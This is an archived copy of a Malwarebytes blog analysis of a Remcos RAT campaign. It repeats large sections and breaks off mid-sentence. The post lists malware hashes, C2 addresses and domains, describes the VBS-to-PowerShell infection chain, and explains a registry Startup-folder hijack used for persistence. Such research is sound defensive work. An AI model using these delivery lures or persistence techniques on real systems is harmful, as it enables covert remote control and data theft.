{
	"id": "d4dba792-2bf1-498c-ae5a-59a6d7657b35",
	"created_at": "2026-04-06T00:15:29.801602Z",
	"updated_at": "2026-04-10T13:11:52.978534Z",
	"deleted_at": null,
	"sha1_hash": "afdb6d26545806385fb8b0974ed373f474fcb366",
	"title": "Remcos RAT delivered via Visual Basic",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 861216,
	"plain_text": "Remcos RAT delivered via Visual Basic\r\nPublished: 2021-07-18 · Archived: 2026-04-05 18:48:31 UTC\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 1 of 42\n\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nThis blog post was authored by Erika Noerenberg\r\nIntroduction\r\nOver the past months, Malwarebytes researchers have been tracking a unique malspam campaign delivering the Remcos\r\nremote access trojan (RAT) via financially-themed emails. Remcos is often delivered via malicious documents or archive\r\nfiles containing scripts or executables. Like other RATs, Remcos gives the threat actor full control over the infected system\r\nand allows them to capture keystrokes, screenshots, credentials, or other sensitive system information. Unlike most RATs\r\nused by malicious actors however, Remcos is marketed as an administrative tool by the company Breaking Security which\r\nsells it openly on their website.\r\nArticle continues below this ad.\r\nDistribution\r\nRemcos often infects a system by embedding a specially-crafted settings file into an Office document, allowing an attacker\r\nto trick a user to run malicious code without additional notification. This variant of Remcos has been observed to be\r\ndistributed via targeted spam emails with an attached archive file. The emails and attachment names have been primarily\r\nfinancially-themed; an example email is shown below:\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 2 of 42\n\nFor illustration, the following table lists a sample of email subjects and attachment names from 2021 by date:\r\nDate Subject Attachment Name Contents\r\n21\r\nJan\r\nSeparate\r\nRemittance\r\nAdvice: paper\r\ndocument no –\r\n9604163\r\nPayment Advice.img Payment Advice.vbs\r\n26\r\nApr\r\nAppraisal Report\r\nfor your Loan\r\nApplication-11003354677341\r\nAppraisal.reportl1100335467734.zip\r\nAppraisal.vbs\r\nProperty.hta*\r\n18\r\nMay\r\nFwd: Appraisal\r\nReport for your\r\nLoan\r\nApplication-1100788392210\r\nAppraisalreportl1100788392210.zip Appraisal..vbs\r\n28\r\nJun\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11002214991\r\ntransaction_completed11003456773311..zip Report-Slip.vbs\r\n6 Jul\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11003456773312\r\ntransaction_completed11003456773312.zip\r\nReport-11003456773312.vbs\r\nIn most Remcos spam campaigns, the payload is an executable contained in an attached archive (.zip) or disk image (.img)\r\nfile, though malicious documents are also sometimes used. In this campaign however, the emails contain a zip archive\r\ncontaining a Visual Basic script (.vbs) which downloads and executes additional scripts and finally installs the Remcos\r\npayload.\r\n*Eariler versions also included a “Property.hta” file which only comprised the VB script wrapped in HTML as seen below.\r\nInterestingly, the body of this HTML consisted only of the text “demo”, which indicates this might have been test code.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 3 of 42\n\nAnalysis\r\nRemcos is a fully-functioning RAT that gives the threat actor full control over the infected system and allows them to collect\r\nkeystrokes, audio, video, screenshots, and system information. Because it has full control, Remcos is also able to download\r\nand execute additional software onto the system. This Remcos distribution utilizes a series of scripts that ultimately results\r\nin the injection of a Remcos payload into the Windows system binary aspnet_compiler.exe. A sample infection chain for\r\nthis variant is shown below:\r\nThe samples analyzed below originate from the attachment Appraisalreportl1100788392210.zip (SHA256\r\n4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a13bb23e). As with all analyzed samples, the the\r\ninfection chain followed the process flow above; the initial Visual Basic script initiates a series of download and execution\r\nof obfuscated scripts that eventually result in the injection of the final Remcos payload into aspnet_compiler.exe.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 4 of 42\n\nAlthough the script above is lengthy due to obfuscation, it ultimately amounts to the following simple powershell command\r\nwhich downloads and executes a second Visual Basic script:\r\nThe first downloaded script (ALL.TXT) also uses simple deobfuscation techniques to perform a few simple tasks. The\r\n$JUANADEARCO variable in this script contains Base64-encoded data which is decoded by the last line of the script (this\r\ndata is shown as decoded in the highlighted box in the image below). This script performs the following actions:\r\nCreates the directory C:UsersPublicRun\r\nDownloads Run_02_02_02.TXT (saved as C:UsersPublicRunRun.vbs)\r\nDownloads Lerveri.txt (saved as UsersPublicRun—–Run+++++++++.ps1)\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersStartup to “C:UsersPublicRun”\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersStartup to “C:UsersPublicRun”\r\nThe shell folder registry entries are legacy keys that are still existent for backwards compatibility. Setting the “Startup”\r\nvalue of these registry entries to the malware’s directory of execution effectively sets the contents of that directory to\r\nexecute upon system startup, ensuring persistence.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 5 of 42\n\nRun.vbs is obfuscated in a similar fashion to the initial Visual Basic script:\r\nThis script (deobfuscated below) is responsible only for execution the main powershell script which contains embedded\r\nbinaries, encoded in hex in plaintext.\r\nOne of the binaries encoded in —–Run+++++++++.ps1 is the Remcos payload which is loaded into the legitimate\r\nWindows binary aspnet_compiler.exe. The following function in the powershell script loads the Remcos PE into the binary:\r\nAlthough all of the analyzed Remcos samples of this campaign since January 2021 call back to the same IP address and port,\r\nno actual C2 traffic has been observed. All of the script downloads have pointed to addresses on the legitimate website\r\nus.archive.org, and the payloads have connected (though only via TCP handshake) to the IP address 185.19.85[.]168 on port\r\n8888.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 6 of 42\n\nBecause this IP address has not changed over several months, we investigated the passive DNS records to see if the\r\ninfrastructure may have been used in other recent attacks. We found that this IP address had the following resolutions over\r\nthe last few months:\r\nAddress First Seen Last Seen\r\nshugardaddy.ddns.net 26 May 21\r\nch-pool-1194.nvpn.to 24 May 21 30 June 21\r\ntippet.duckdns.org 13 May 21 16 May 21\r\nmail.swissauto.top 29 May 20 11 May 21\r\nrandyphoenix.hopto.org 4 April 21 14 April 21\r\nExamination of this IP address revealed several hosted services on multiple ports. The highlighted date range above is\r\ninteresting as it appears to be a mail server, and Spamhaus Zen classifies this address as blocked due to spam. Furthermore,\r\nanalysis also revealed that the #totalhash malware database contains malware associated with this address going back as far\r\nas 2013. Correlating additional malware associated with this address showed several other versions of Remcos samples\r\nconnecting to the same IP (many to shugardaddy.ddns.net port 5946) – a few recent samples are shown below:\r\nSHA256 Hash\r\nDate Last\r\nSeen\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1 6 Jul 21\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e 5 Jul 21\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a 29 Jun 21\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4 25 Jun 21\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2 25 Jun 21\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36 21 Jun 21\r\nOne identifying factor from this campaign is the use of us.archive.org to host payloads. Although this is not unique to\r\nmalware campaigns in general, it is unique to the Remcos campaigns we have analyzed – only the VBS method of\r\ndistribution has been observed to display this behavior.\r\nIn an analysis from Morphisec in March of this year, an HCrypt loader sample was analyzed that demonstrated a similar\r\ninfection chain to the Remcos samples discussed above. Although the stages and scripts are not identical, the intermediary\r\nsteps share a few similarities, such as the file names of the downloaded scripts ALL.txt, Server.txt, and in newer samples,\r\nBypass.txt. The scripts also have a few function names in common, but the HCrypt samples have anti-analysis and anti-virus\r\nevasion functionality not seen in the Remcos samples. Further research is required to determine whether this set of scripts is\r\na generically available package, or specific to a particular actor and being re-used across campaigns.\r\nAlthough the actor or group behind this campaign is not known, the sporadic nature of the emails distributing this malware\r\nsuggests that it could be targeted in nature. Remcos is a mature trojan that has evolved over many years; though the basic\r\ncapabilities have remained the same, the methodologies of distribution and installation continue to change. Because it is\r\nsoftware that can be purchased openly online, it is difficult to trace or attribute usage to a particular actor. However, given\r\nthe consistency of network infrastructure and installation methodology, it is possible that the motivation or actors behind\r\nthese attacks could be identified. Malwarebytes analysts continue to monitor and track this threat and will update detections\r\nand indicators as needed.\r\nProtection\r\nMalwarebytes protects users from Remcos by using real-time protection.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 7 of 42\n\nReferences\r\nhttps://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly\r\nhttps://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers\r\nhttps://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service\r\nIOCs\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 8 of 42\n\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 9 of 42\n\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nThis blog post was authored by Erika Noerenberg\r\nIntroduction\r\nOver the past months, Malwarebytes researchers have been tracking a unique malspam campaign delivering the Remcos\r\nremote access trojan (RAT) via financially-themed emails. Remcos is often delivered via malicious documents or archive\r\nfiles containing scripts or executables. Like other RATs, Remcos gives the threat actor full control over the infected system\r\nand allows them to capture keystrokes, screenshots, credentials, or other sensitive system information. Unlike most RATs\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 10 of 42\n\nused by malicious actors however, Remcos is marketed as an administrative tool by the company Breaking Security which\r\nsells it openly on their website.\r\nDistribution\r\nRemcos often infects a system by embedding a specially-crafted settings file into an Office document, allowing an attacker\r\nto trick a user to run malicious code without additional notification. This variant of Remcos has been observed to be\r\ndistributed via targeted spam emails with an attached archive file. The emails and attachment names have been primarily\r\nfinancially-themed; an example email is shown below:\r\nFor illustration, the following table lists a sample of email subjects and attachment names from 2021 by date:\r\nDate Subject Attachment Name Contents\r\n21\r\nJan\r\nSeparate\r\nRemittance\r\nAdvice: paper\r\ndocument no –\r\n9604163\r\nPayment Advice.img Payment Advice.vbs\r\n26\r\nApr\r\nAppraisal Report\r\nfor your Loan\r\nApplication-11003354677341\r\nAppraisal.reportl1100335467734.zip\r\nAppraisal.vbs\r\nProperty.hta*\r\n18\r\nMay\r\nFwd: Appraisal\r\nReport for your\r\nLoan\r\nApplication-1100788392210\r\nAppraisalreportl1100788392210.zip Appraisal..vbs\r\n28\r\nJun\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11002214991\r\ntransaction_completed11003456773311..zip Report-Slip.vbs\r\n6 Jul Fwd: Reminder:\r\nYour July\r\ntransaction_completed11003456773312.zip Report-11003456773312.vbs\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 11 of 42\n\nDate Subject Attachment Name Contents\r\nAppointment-11003456773312\r\nIn most Remcos spam campaigns, the payload is an executable contained in an attached archive (.zip) or disk image (.img)\r\nfile, though malicious documents are also sometimes used. In this campaign however, the emails contain a zip archive\r\ncontaining a Visual Basic script (.vbs) which downloads and executes additional scripts and finally installs the Remcos\r\npayload.\r\n*Eariler versions also included a “Property.hta” file which only comprised the VB script wrapped in HTML as seen below.\r\nInterestingly, the body of this HTML consisted only of the text “demo”, which indicates this might have been test code.\r\nAnalysis\r\nRemcos is a fully-functioning RAT that gives the threat actor full control over the infected system and allows them to collect\r\nkeystrokes, audio, video, screenshots, and system information. Because it has full control, Remcos is also able to download\r\nand execute additional software onto the system. This Remcos distribution utilizes a series of scripts that ultimately results\r\nin the injection of a Remcos payload into the Windows system binary aspnet_compiler.exe. A sample infection chain for\r\nthis variant is shown below:\r\nThe samples analyzed below originate from the attachment Appraisalreportl1100788392210.zip (SHA256\r\n4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a13bb23e). As with all analyzed samples, the the\r\ninfection chain followed the process flow above; the initial Visual Basic script initiates a series of download and execution\r\nof obfuscated scripts that eventually result in the injection of the final Remcos payload into aspnet_compiler.exe.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 12 of 42\n\nAlthough the script above is lengthy due to obfuscation, it ultimately amounts to the following simple powershell command\r\nwhich downloads and executes a second Visual Basic script:\r\nThe first downloaded script (ALL.TXT) also uses simple deobfuscation techniques to perform a few simple tasks. The\r\n$JUANADEARCO variable in this script contains Base64-encoded data which is decoded by the last line of the script (this\r\ndata is shown as decoded in the highlighted box in the image below). This script performs the following actions:\r\nCreates the directory C:UsersPublicRun\r\nDownloads Run_02_02_02.TXT (saved as C:UsersPublicRunRun.vbs)\r\nDownloads Lerveri.txt (saved as UsersPublicRun—–Run+++++++++.ps1)\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersStartup to “C:UsersPublicRun”\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersStartup to “C:UsersPublicRun”\r\nThe shell folder registry entries are legacy keys that are still existent for backwards compatibility. Setting the “Startup”\r\nvalue of these registry entries to the malware’s directory of execution effectively sets the contents of that directory to\r\nexecute upon system startup, ensuring persistence.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 13 of 42\n\nRun.vbs is obfuscated in a similar fashion to the initial Visual Basic script:\r\nThis script (deobfuscated below) is responsible only for execution the main powershell script which contains embedded\r\nbinaries, encoded in hex in plaintext.\r\nOne of the binaries encoded in —–Run+++++++++.ps1 is the Remcos payload which is loaded into the legitimate\r\nWindows binary aspnet_compiler.exe. The following function in the powershell script loads the Remcos PE into the binary:\r\nAlthough all of the analyzed Remcos samples of this campaign since January 2021 call back to the same IP address and port,\r\nno actual C2 traffic has been observed. All of the script downloads have pointed to addresses on the legitimate website\r\nus.archive.org, and the payloads have connected (though only via TCP handshake) to the IP address 185.19.85[.]168 on port\r\n8888.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 14 of 42\n\nBecause this IP address has not changed over several months, we investigated the passive DNS records to see if the\r\ninfrastructure may have been used in other recent attacks. We found that this IP address had the following resolutions over\r\nthe last few months:\r\nAddress First Seen Last Seen\r\nshugardaddy.ddns.net 26 May 21\r\nch-pool-1194.nvpn.to 24 May 21 30 June 21\r\ntippet.duckdns.org 13 May 21 16 May 21\r\nmail.swissauto.top 29 May 20 11 May 21\r\nrandyphoenix.hopto.org 4 April 21 14 April 21\r\nExamination of this IP address revealed several hosted services on multiple ports. The highlighted date range above is\r\ninteresting as it appears to be a mail server, and Spamhaus Zen classifies this address as blocked due to spam. Furthermore,\r\nanalysis also revealed that the #totalhash malware database contains malware associated with this address going back as far\r\nas 2013. Correlating additional malware associated with this address showed several other versions of Remcos samples\r\nconnecting to the same IP (many to shugardaddy.ddns.net port 5946) – a few recent samples are shown below:\r\nSHA256 Hash\r\nDate Last\r\nSeen\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1 6 Jul 21\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e 5 Jul 21\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a 29 Jun 21\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4 25 Jun 21\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2 25 Jun 21\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36 21 Jun 21\r\nOne identifying factor from this campaign is the use of us.archive.org to host payloads. Although this is not unique to\r\nmalware campaigns in general, it is unique to the Remcos campaigns we have analyzed – only the VBS method of\r\ndistribution has been observed to display this behavior.\r\nIn an analysis from Morphisec in March of this year, an HCrypt loader sample was analyzed that demonstrated a similar\r\ninfection chain to the Remcos samples discussed above. Although the stages and 